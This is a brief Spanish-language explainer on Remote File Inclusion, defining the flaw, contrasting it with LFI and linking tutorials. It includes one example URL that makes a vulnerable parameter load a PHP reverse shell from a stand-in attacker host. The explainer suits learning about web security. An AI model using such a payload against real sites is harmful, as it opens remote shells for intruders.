Remote File Inclusion (RFI)

Definición

La Inclusión Remota de Archivos (RFI): es una vulnerabilidad de seguridad que permite a un atacante cargar y ejecutar archivos desde servidores remotos. Esto sucede cuando una aplicación web acepta datos del usuario, como rutas de archivos, sin realizar una validación adecuada. Al manipular estas entradas, el atacante puede hacer que la aplicación cargue archivos maliciosos desde servidores bajo su control.

¿Cuál es la diferencia entre un LFI y un RFI?

RFI vs LFI: LFI afecta archivos locales, mientras que RFI permite ejecutar archivos maliciosos desde servidores externos.

http://r4z0r.github.io/index.php?url=http://attacker.com/php-reverse-shell.php	

Referencias

• https://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html

• https://rahulk2903.medium.com/file-inclusion-tryhackme-walkthrough-99288e6dd348

• https://deephacking.tech/remote-file-inclusion-rfi-web/